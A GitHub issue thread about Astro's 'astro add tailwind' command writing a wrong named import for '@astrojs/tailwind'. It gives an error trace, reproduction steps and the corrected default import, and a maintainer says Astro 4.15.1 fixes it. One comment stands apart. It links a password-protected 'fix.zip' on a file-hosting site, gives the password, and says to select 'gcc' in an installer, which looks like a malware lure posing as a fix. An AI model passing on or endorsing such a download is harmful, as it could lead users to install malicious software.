### ISSUE TITLE
Incorrect automatic tailwind import

### ISSUE THREAD

**Issue by daikiejp** [withastro/astro#11877]
### Astro Info

```block
10:18:06 AM [vite] Error when evaluating SSR module /Users/*****/dev/test-bug/astro.config.mjs: failed to import "@astrojs/tailwind"
|- SyntaxError: [vite] The requested module '@astrojs/tailwind' does not provide an export named 'tailwind'
    at analyzeImportedModDifference (file:///Users/*****/dev/test-bug/node_modules/vite/dist/node/chunks/dep-BzOvws4Y.js:51946:15)
    at nodeImport (file:///Users/*****/dev/test-bug/node_modules/vite/dist/node/chunks/dep-BzOvws4Y.js:52958:5)
    at async ssrImport (file:///Users/*****/dev/test-bug/node_modules/vite/dist/node/chunks/dep-BzOvws4Y.js:52812:16)
    at async eval (/Users/*****/dev/test-bug/astro.config.mjs:4:31)
    at async instantiateModule (file:///Users/*****/dev/test-bug/node_modules/vite/dist/node/chunks/dep-BzOvws4Y.js:52870:5)
```

### Describe the Bug

After a new astro deploy and install tailwind an error occurs due the wrong importation.

Error:
```
[astro] Unable to load your Astro config

[vite] The requested module '@astrojs/tailwind' does not provide an export named 'tailwind'
```

Steps to reproduce:

```bash
npm create astro@latest
npx astro add tailwind
npm start
```

### What's the expected result?

Solution:

The automatic import is wrong `import { tailwind } from '@astrojs/tailwind';`, need fix by:

```
import tailwind from '@astrojs/tailwind';
```

### Link to Minimal Reproducible Example

https://stackblitz.com/edit/github-vca8s2?file=astro.config.mjs

### Participation

- [x] I am willing to submit a pull request for this issue.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ematipico** [comment]
This is fixed in Astro 4.15.1

https://github.com/withastro/astro/releases/tag/astro%404.15.1
